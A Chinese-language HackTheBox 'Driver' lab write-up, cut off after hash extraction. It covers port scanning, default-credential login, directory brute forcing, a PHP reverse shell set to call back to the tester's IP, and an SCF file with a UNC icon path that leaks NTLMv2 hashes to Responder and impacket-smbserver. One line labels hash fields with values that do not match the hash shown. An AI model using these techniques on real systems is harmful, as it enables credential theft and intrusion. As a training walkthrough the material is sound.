HTB-Driver:

机器简介：

Driver 是一台简单的 Windows 机器，专注于打印机开发。对机器的枚举显示，Web 服务器正在监听端口 80，同时 SMB 正在监听端口 445，WinRM 正在监听端口 5985。导航到该网站显示，它使用基本 HTTP 身份验证受到保护。在尝试常用凭据时，admin:admin 凭据被接受，因此我们能够访问该网页。该网页提供了一项功能，可以将打印机固件上传到 SMB 共享上，以供远程团队进行测试和验证。上传包含从本地机器获取远程文件的命令的 Shell 命令文件会导致用户 tony 的 NTLM 哈希被转发回给我们。破解捕获的哈希以检索纯文本密码，我们能够使用 WinRM 以 tony 身份登录。然后，切换到 meterpreter 会话，发现该机器容易受到本地特权攻击，该攻击会滥用远程机器上存在的特定打印机驱动程序。利用该漏洞，我们可以获得“NT AUTHORITY\SYSTEM”身份的会话。

渗透过程：

初始侦察：

nmap端口扫描

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo nmap -sT --min-rate 10000 -p- 10.129.40.36 -oA nmapscan/ports 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 07:49 EDT
Nmap scan report for loaclhost (10.129.40.36)
Host is up (0.13s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 33.78 seconds

nmap详细信息扫描

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo nmap -sT -sV -sC -O -p80,135,445,5985 10.129.40.36 -oA
nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 07:59 EDT
Nmap scan report for loaclhost (10.129.40.36)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
| http-methods: 
|_ Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup:
WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1
open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|Phone (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8
cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (87%), Microsoft
Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h16m36s, deviation: 0s, median: 1h16m35s
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2024-05-13T13:16:07
|_ start_date: 2024-05-13T13:00:10
OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.97 seconds

开放了四个端⼝，有信息的语句是“Basic realm=MFP Firmware Update Center. Please enter password for admin”，其中也提到了⽤户名admin。

nmap udp扫描

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo nmap -sU --top-ports 20 10.129.40.36 -oA nmapscan/udp 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 08:46 EDT
Nmap scan report for driver.htb (10.129.40.36)
Host is up (0.091s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 3.13 seconds

并没有明确开放状态，后续按需求进行深入扫描，可与其他扫描同步启动，节约时间

nmap漏洞脚本扫描

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo nmap --script=vuln -p80,135,445,5985 10.129.40.36 -oA nmapscan/vuln
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 07:59 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for loaclhost (10.129.40.36)
Host is up (0.081s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
Nmap done: 1 IP address (1 host up) scanned in 488.23 seconds

这里扫描会有一些慢，耐心等待，没有新的有价值的信息

web80端口渗透

打开web 80端口页面，显示登录认证，nmap扫描结果中提示了用户名是admin，自然想到了弱密码admin：

使用admin:admin成功登录

这里也可以自己使用burp抓包进行爆破操作。

这里也可以使用nmap自带脚本进行爆破操作：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo nmap -p80 --script=http-brute driver.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 12:43 EDT
Nmap scan report for driver.htb (10.129.40.36)
Host is up (0.14s latency).
PORT STATE SERVICE
80/tcp open http
| http-brute: 
| Accounts: 
| admin:admin - Valid credentials
|_ Statistics: Performed 42132 guesses in 600 seconds, average tps: 70.0
Nmap done: 1 IP address (1 host up) scanned in 600.43 seconds

登录进后台后，页面显示是MFP固件更新中心，提示“我们作为卓越中心的一部分，对多功能打印机进行各种测试，包括固件更新，驱动程序等。”最下方信息泄露了一个域名。那么我们可以修改hosts文件。

执行如下语句，添加hosts记录：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo bash -c 'echo "10.129.40.36 driver.htb" >> /etc/hosts'

确认一手：

┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ tail -n 1 /etc/hosts 
10.129.40.36 driver.htb

渗透测试的时候，获得的域名不是必须本地解析，如果站点默认的内容和绑定域名的内容是⼀样的，hosts是否解析就完全⼀样了。

经过测试发现能够上传固件进行测试：

⻚⾯说：”选择打印机型号并上传相应的固件更新到我们的⽂件共享。我们的测试团队将⼿动审核这些上传内容，并很快启动测试。“

你能想到什么？它说传到⽂件共享，445端⼝是开放的，值得去看看。技术栈是php，可以上传`php

反弹shell`看能否执⾏，但⼀般smb不会是web⽬录，其实可以不尝试。

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ nxc smb driver.htb --shares -u redteamnotes -p ''
SMB 10.129.40.36 445 DRIVER [*] Windows 10 Enterprise
10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.129.40.36 445 DRIVER [-] DRIVER\redteamnotes:
STATUS_LOGON_FAILURE

应该也是连接不上的：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ smbclient -L 10.129.40.36 -N
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED

135端⼝也是开放的，可以获得⼀些信息吗？

┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ rpcclient -U "" -N 10.129.40.36
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED

⽆法连接，⼀般也可以⽤enum4linux枚举⼀下，建议使⽤这个⼯具的最新版，即enum4linux-ng，可以在kali中直接安装， sudo apt install enum4linux-ng 即可.

┌──(kali㉿kali)-[~/RedteamNotes/aptlabs]
└─$ enum4linux-ng driver.htb
ENUM4LINUX - next generation (v1.3.3)
==========================
| Target Information |
==========================
[*] Target ........... driver.htb
[*] Username ......... ''
[*] Random Username .. 'mvwarusw'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
===================================
| Listener Scan on driver.htb |
===================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[-] Could not connect to SMB over NetBIOS on 139/tcp: timed out
=========================================================
| NetBIOS Names and Workgroup/Domain for driver.htb |
=========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
=======================================
| SMB Dialect Check on driver.htb |
=======================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
 SMB 1.0: true
 SMB 2.02: true
 SMB 2.1: true
 SMB 3.0: true
 SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false
=========================================================
| Domain Information via SMB session for driver.htb |
=========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DRIVER
NetBIOS domain name: ''
DNS domain: DRIVER
FQDN: DRIVER
Derived membership: workgroup member
Derived domain: unknown
=======================================
| RPC Session Check on driver.htb |
=======================================
[*] Check for null session
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
[-] Sessions failed, neither null nor user sessions were possible
=============================================
| OS Information via RPC for driver.htb |
=============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Skipping 'srvinfo' run, not possible with provided credentials
[+] After merging OS information we have the following result:
OS: Windows 10 Enterprise 10240
OS version: '10.0'
OS release: '1507'
OS build: '10240'
Native OS: Windows 10 Enterprise 10240
Native LAN manager: Windows 10 Enterprise 6.3
Platform id: null
Server type: null
Server type string: null
[!] Aborting remainder of tests since sessions failed, rerun with valid
credentials
Completed after 37.96 seconds

没有更多有价值的信息，现在是能上传，但是不能访问，不知道上传之后的⽂件位置。根据技术栈，上传⼀个php反弹shell⽂件，尝试⽬录爆破。

┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ sudo updatedb 
┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ locate reverse-shell 
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/metasploit-framework/docs/metasploit-framework.wiki/How-to-use-areverse-shell-in-Metasploit.md
/usr/share/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverseshell.php
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/php/php-reverse-shell.php
┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ vim shell.php 
┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ grep -i "change this" shell.php 
$ip = '10.10.16.9'; // CHANGE THIS
$port = 443; // CHANGE THIS

在如下页面上传：

在目录爆破前，考虑到页面有认证，认证时burp拦截请求头：

即：Authorization: Basic YWRtaW46YWRtaW4=。然后开始爆破：

使用feroxbuster:

┌──(kali㉿kali)-[~/HackTheBox/Driver] 
└─$ feroxbuster -u http://driver.htb -x php -H "Authorization: Basic YWRtaW46YWRtaW4=" -w /usr/share/seclists/Discovery/Web-Content/directory-listlowercase-2.3-medium.txt
___ ___ __ __ __ __ __ ___ 
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__ 
| |___ | \ | \ | \__, \__/ / \ | |__/ |___ 
by Ben "epi" Risher 🤓 ver: 2.10.3 
───────────────────────────┬──────────────────────
🎯 Target Url │ http://driver.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/WebContent/directory-list-lowercase-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🤯 Header │ Authorization: Basic YWRtaW46YWRtaW4=
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 2l 10w 148c http://driver.htb/images =>
http://driver.htb/images/ 
200 GET 185l 379w 4279c http://driver.htb/index.php 
200 GET 217l 461w 5119c http://driver.htb/fw_up.php 
200 GET 709l 4309w 366212c http://driver.htb/images/ricoh.png 
200 GET 185l 379w 4279c http://driver.htb/ 
[####################] - 21m 415268/415268 0s found:5 errors:30 
[####################] - 21m 207629/207629 168/s http://driver.htb/
[####################] - 21m 207629/207629 168/s 
http://driver.htb/images/

用gobuster也是okd：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ gobuster dir -u http://driver.htb -U admin -P admin -x php -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://driver.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Auth User: admin
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 148] [-->
http://driver.htb/images/]
/Images (Status: 301) [Size: 148] [-->
http://driver.htb/Images/]
/index.php (Status: 200) [Size: 4279]
/Index.php (Status: 200) [Size: 4279]
/index.php (Status: 200) [Size: 4279]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================

均并没有实质性发现。其实还有很多办法交叉验证：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ ffuf -c -H 'Authentication: Basic YWRtaW46YWRtaW4=' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u
http://10.10.16.9/FUZZ -e .php,.zip,.txt,.pdf 
 /'___\ /'___\ /'___\ 
 /\ \__/ /\ \__/ __ __ /\ \__/ 
 \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 
 \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 
 \ \_\ \ \_\ \ \____/ \ \_\ 
 \/_/ \/_/ \/___/ \/_/ 
 v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.16.9/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-
2.3-medium.txt
:: Header : Authentication: Basic YWRtaW46YWRtaW4=
:: Extensions : .php .zip .txt .pdf 
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [1102800/1102800] :: Job [1/1] :: 66666 req/sec :: Duration:
[0:00:21] :: Errors: 1102800 ::

可同时开多个目录扫描并发进行，提高效率

攻击面分析：

接下来该怎么办？ 这⾥需要知识储备，需要对windows内⽹、smb、内⽹协议等等有深刻的理解，才可能构建攻击场景，当然也需要试错，毕竟即使理解smb下的⽹络机制，有⼿段触发底层内⽹协议，但作为⿊盒测试，还是要猜，要不断尝试试。

这里涉及三个⽅⾯的知识点：内⽹认证机制、内⽹协议和SMB

• 内网认证机制：内⽹认证机制是⼀个⼴泛⽽复杂的话题，但这⾥限制在适⽤smb相关的认证。⾮域环境下，⼀般是ntlm加密。这套加密体系，早期叫做LM (LAN Manager)，安全性⾮常低，由于它使⽤简单的哈希算法（不包含盐值），并将密码分割成7个字符的块后再分别哈希，使其极易被暴⼒破解。再之后是NTLMv1，⽐LM有更好的安全性，但仍可被较容易地破解，特别是当攻击者能够捕获到⽹络中的认证流量时。当前⼴泛使⽤的版本是NTLMv2，它进⼀步增强了安全性，通过引⼊客户端和服务器的挑战响应，以及在哈希过程中使⽤HMAC-MD5，这使得它⽐前两者更难被破解。但在某些条件下，特别是使⽤弱密码时，仍然存在被被暴⼒破解的可能。

• 内网协议：内⽹协议，内⽹中可以⽤dns解析主机名到ip，但内⽹并不⼀定⼀直有dns，⼀般内⽹中在没有dns的时候，解析协议就会降级，降为NBT-NS (NetBIOS Name Service) 和 LLMNR (Link-Local Multicast Name Resolution) 这种⼴播的协议，smb就是使⽤的这种降级协议。

• SMB：SMB（Server Message Block）是⼀种在⽹络上⽤于⽂件共享、打印服务和其他⽹络通信的应⽤层协议。最初由IBM开发并由Microsoft进⼀步扩展，SMB协议使计算机能够在局域⽹（LAN）中访问⽂件、打印机、串⾏端⼝和通信。随着技术的发展，SMB协议经历了多次重要的更新，包括SMB 1.0、SMB 2.0、SMB 2.1、SMB 3.0和最新的SMB 3.1.1。每个版本都在性能、效率和安全性⽅⾯进⾏了改进，尤其是从SMB 2.0开始，显著增加了对⼤型⽂件的传输速度和减少了⽹络延迟。SMB协议⽀持多种认证⽅法，主要的包括NTLM（NT LAN Manager）和Kerberos。NTLM是⼀种挑战/响应认证协议，⼴泛⽤于没有Active Directory的环境。它通过不直接在⽹络中传输⽤户的密码，⽽是使⽤密码的散列值来完成认证，提供了基本的安全保障。⽽在Active Directory环境中，Kerberos成为⾸选的认证⽅法。

当然在打这个靶场的过程中：还让我了解到嗅探这回事：

知道怎么嗅探，有⼯具可⽤，内⽹嗅探著名的是responder。Responder 可以对接收到的NTLM认证尝试进⾏中间⼈攻击（MITM），通过向请求者发送伪造的NTLM挑战来获取NTLM响应。这个响应包含了加密后的⽤户凭据的散列值。Responder 不直接解密这些散列值；⽽是采集这些数据，以便通过离线攻击解码这些散列。Windows下有inveigh这个替代品。

最后还要解决⼀个问题，在这样的场景下有触发ntlm认证的⼿段吗？就是在smb应⽤内发起某个访问，触发认证，让responder能有⽤武之地，作为中间⼈攻击的发起者，但总得有流量啊！！！

Payload要传上去，这好像不难，看到driver.htb的上传⻚⾯没有做很多限制，貌似各类型⽂件都可以上传。但怎么触发某种访问，进⽽触发ntlm认证？这⾥要⽤到scf⽂件，你可以在baidu中看到这种⽂件类型的介绍[explorer.scf_百度百科](https://baike.baidu.com/item/explorer.scf)

总而言之，SCF⽂件是⼀种Windows Shell ⽂件，⽤于执⾏特定的系统命令。这种⽂件格式虽然不太常⻅，但功能很对我们渗透测试的应用，可以⽤来⾃动化某些与Windows资源管理器交互的任务，例如打开特定的系统⼯具或控制资源管理器的⾏为。SCF ⽂件是纯⽂本⽂件，可以使⽤任何⽂本编辑器创建和编辑。⽂件内容定义了要执⾏的命令，以及可能的⼀些参数设置。从百度词条中，我们编辑⼀个SCF⽂件：

[Shell]
Command=2
IconFile=explorer.exe,1
[Taskbar]
Command=Explorer

它能执⾏系统命令，站在渗透测试视⻆来看，结合当前的处境、场景和能⼒。既然它能触发系统命令，那就访问⼀个smb位置，不存在的位置，这样就能导致解析协议降级到nbt-ns或llmnr，这样就有可能触发ntlm认证，我们就可能做到responder的mitm，也就是中间⼈攻击。

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ cat test.scf 
[Shell]
Command=2
IconFile=\\10.10.16.9\redteamnotes
[Taskbar]
Command=Explorer

构想到尝试到⽅案，甚⾄实现都有了，做出尝试。

crackmapexec或nxc有自动化的攻击有涉及到：

┌──(kali㉿kali)-[~/aptlabs]
└─$ sudo nxc smb -L | grep slinky
[*] slinky Creates windows shortcuts with the icon
attribute containing a UNC path to the specified SMB server in all shares with
write permissions

利用文章：(https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-slinky)

smb共享scf⽂件攻击

确定⽹卡名tun0，然后启动responder监听：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ ip a 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group
default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
 inet 127.0.0.1/8 scope host lo
 valid_lft forever preferred_lft forever
 inet6 ::1/128 scope host noprefixroute 
 valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
 link/ether 00:0c:29:67:78:15 brd ff:ff:ff:ff:ff:ff
 inet 172.16.94.128/24 brd 172.16.94.255 scope global dynamic noprefixroute
eth0
 valid_lft 1420sec preferred_lft 1420sec
 inet6 fe80::84f7:88a9:9ab1:214d/64 scope link noprefixroute 
 valid_lft forever preferred_lft forever
12: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel
state UNKNOWN group default qlen 500
 link/none 
 inet 10.10.16.9/23 scope global tun0
 valid_lft forever preferred_lft forever
 inet6 dead:beef:4::1007/64 scope global 
 valid_lft forever preferred_lft forever
 inet6 fe80::6404:9b56:ebd4:d95/64 scope link stable-privacy proto
kernel_ll 
 valid_lft forever preferred_lft forever

在tun0⽹卡上启动responder：

┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ sudo responder -I tun0 -v __
 .----.-----.-----.-----.-----.-----.--| |.-----.----.
 | _| -__|__ --| _ | _ | | _ || -__| _|
 |__| |_____|_____| __|_____|__|__|_____||_____|__|
 |__|
 NBT-NS, LLMNR & MDNS Responder 3.1.4.0
 To support this project:
 Github -> https://github.com/sponsors/lgandx
 Paypal -> https://paypal.me/PythonResponder
 Author: Laurent Gaffie (laurent.gaffie@gmail.com)
 To kill this script hit CTRL-C
[+] Poisoners:
 LLMNR [ON]
 NBT-NS [ON]
 MDNS [ON]
 DNS [ON]
 DHCP [OFF]
[+] Servers:
 HTTP server [ON]
 HTTPS server [ON]
 WPAD proxy [OFF]
 Auth proxy [OFF]
 SMB server [ON]
 Kerberos server [ON]
 SQL server [ON]
 FTP server [ON]
 IMAP server [ON]
 POP3 server [ON]
 SMTP server [ON]
 DNS server [ON]
 LDAP server [ON]
 MQTT server [ON]
 RDP server [ON]
 DCE-RPC server [ON]
 WinRM server [ON]
 SNMP server [OFF]
[+] HTTP Options:
 Always serving EXE [OFF]
 Serving EXE [OFF]
 Serving HTML [OFF]
 Upstream Proxy [OFF]
[+] Poisoning Options:
 Analyze Mode [OFF]
 Force WPAD auth [OFF]
 Force Basic Auth [OFF]
 Force LM downgrade [OFF]
 Force ESS downgrade [OFF]
[+] Generic Options:
 Responder NIC [tun0]
 Responder IP [10.10.16.9]
 Responder IPv6 [dead:beef:4::1007]
 Challenge set [random]
 Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
 Responder Machine Name [WIN-B87ERV8GOUE]
 Responder Domain Name [SFNW.LOCAL]
 Responder DCE-RPC Port [47745]
[+] Listening for events...

然后在drvier.htb的上传⻚⾯中上传scf⽂件。随着提交完成，很快我们捕捉到了流量和hash：

[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.40.36
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash :
tony::DRIVER:b558c4920db32a40:EDEFDDF5010502EB0BE3049977FD6CE0:010100000000000000B9E32944A5DA019005C2FBCD3E5D1A0000000002000800530046004E00570001001E00570049004E002D00420038003700450052005600380047004F005500450004003400570049004E002D00420038003700450052005600380047004F00550045002E00530046004E0057002E004C004F00430041004C0003001400530046004E0057002E004C004F00430041004C0005001400530046004E0057002E004C004F00430041004C000700080000B9E32944A5DA01060004000200000008003000300000000000000000000000002000003754E27C9803F40A182B2657EB8193AA5EB370597B636D83AE5AB2CE59E879CA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000
.
.
.省略
.
.
[SMB] NTLMv2-SSP Client : 10.129.40.36
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash :
tony::DRIVER:12430e8b200482bf:87E6078FDC62C2034CA53A176E141648:010100000000000000B9E32944A5DA01526894628D5AA73E0000000002000800530046004E00570001001E00570049004E002D00420038003700450052005600380047004F005500450004003400570049004E002D00420038003700450052005600380047004F00550045002E00530046004E0057002E004C004F00430041004C0003001400530046004E0057002E004C004F00430041004C0005001400530046004E0057002E004C004F00430041004C000700080000B9E32944A5DA01060004000200000008003000300000000000000000000000002000003754E27C9803F40A182B2657EB8193AA5EB370597B636D83AE5AB2CE59E879CA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000
[+] Exiting...

扩展：

其实responder这⾥也可以⽤smbserver服务器替代，⽐如先建⽴⼀个当前⽬录的共享，共享名为test：

然后将之前的scf⽂件重新上传，同样也能看到smbserver的⽇志已经捕捉到了ntlmv2哈希。

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo impacket-smbserver test . -smb2support 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.40.36,49594)
[*] AUTHENTICATE_MESSAGE (DRIVER\tony,DRIVER)
[*] User DRIVER\tony authenticated successfully
[*]
tony::DRIVER:aaaaaaaaaaaaaaaa:afda2e9608d11e16b53f1f35e75171a3:0101000000000000808bdae16fa5da01d201fa7c9015661300000000010010004a006900790078007600770056005600030010004a0069007900780076007700560056000200100050005900500067005900610056005400040010005000590050006700590061005600540007000800808bdae16fa5da01060004000200000008003000300000000000000000000000002000003754e27c9803f40a182b2657eb8193aa5eb370597b636d83ae5ab2ce59e879ca0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:redteamnotes)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:redteamnotes)
[*] Closing down connection (10.129.40.36,49594)

ctrl+c结束掉responder命令，然后提取出其中的hash，存⼊digest⽂件中。

这⾥启动responder的时候，我⽤了-v参数，否则可能会出现如下捕捉后划过捕捉的状态：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo responder -I tun0 
......
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[+] Exiting...

其实无伤大雅，也就是不重复捕捉⽽已，也可以在kali的 /usr/share/responder/logs/ 看到历史记录。

破解NTLMv2哈希

认识一手这哥们：

[SMB] NTLMv2-SSP Client : 10.129.40.36
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash :
tony::DRIVER:b558c4920db32a40:EDEFDDF5010502EB0BE3049977FD6CE0:010100000000000000B9E32944A5DA019005C2FBCD3E5D1A0000000002000800530046004E00570001001E00570049004E002D00420038003700450052005600380047004F005500450004003400570049004E002D00420038003700450052005600380047004F00550045002E00530046004E0057002E004C004F00430041004C0003001400530046004E0057002E004C004F00430041004C0005001400530046004E0057002E004C004F00430041004C000700080000B9E32944A5DA01060004000200000008003000300000000000000000000000002000003754E27C9803F40A182B2657EB8193AA5EB370597B636D83AE5AB2CE59E879CA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000

tony::DRIVER是⽤户和域名，49bd74badf6a3323是⽤户哈希（NTLM哈希），C89102A376780EC97035160055778802是服务器挑战（Challenge），最后⼀⻓串是⽤户响应（Response）。

提取一下其中hash部分：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ grep -o 'tony::.*' digest | tee digest-only 
tony::DRIVER:b558c4920db32a40:EDEFDDF5010502EB0BE3049977FD6CE0:010100000000000000B9E32944A5DA019005C2FBCD3E5D1A0000000002000800530046004E00570001001E00570049004E002D00420038003700450052005600380047004F005500450004003400570049004E002D00420038003700450052005600380047004F00550045002E00530046004E0057002E004C004F00430041004C0003001400530046004E0057002E004C004F00430041004C0005001400530046004E0057002E004C004F00430041004C000700080000B9E32944A5DA01060004000200000008003000300000000000000000000000002000003754E27C9803F40A182B2657EB8193AA5EB370597B636D83AE5AB2CE59E879CA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000
tony::DRIVER:b4e90390151fb9cf:9C5536B86BE2CC1E4450B33AE0652DA3:010100000000000000B9E32944A5DA01835CA668D7A488860000000002000800530046004E00570001001E00570049004E002D00420038003700450052005600380047004F005500450004003400570049004E002D00420038003700450052005600380047004F00550045002E00530046004E0057002E004C004F00430041004C0003001400530046004E0057002E004C004F00430041004C0005001400530046004E0057002E004C004F00430041004C000700080000B9E32944A5DA01060004000200000008003000300000000000000000000000002000003754E27C9803F40A182B2657EB8193AA5EB370597B636D83AE5AB2CE59E879CA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000
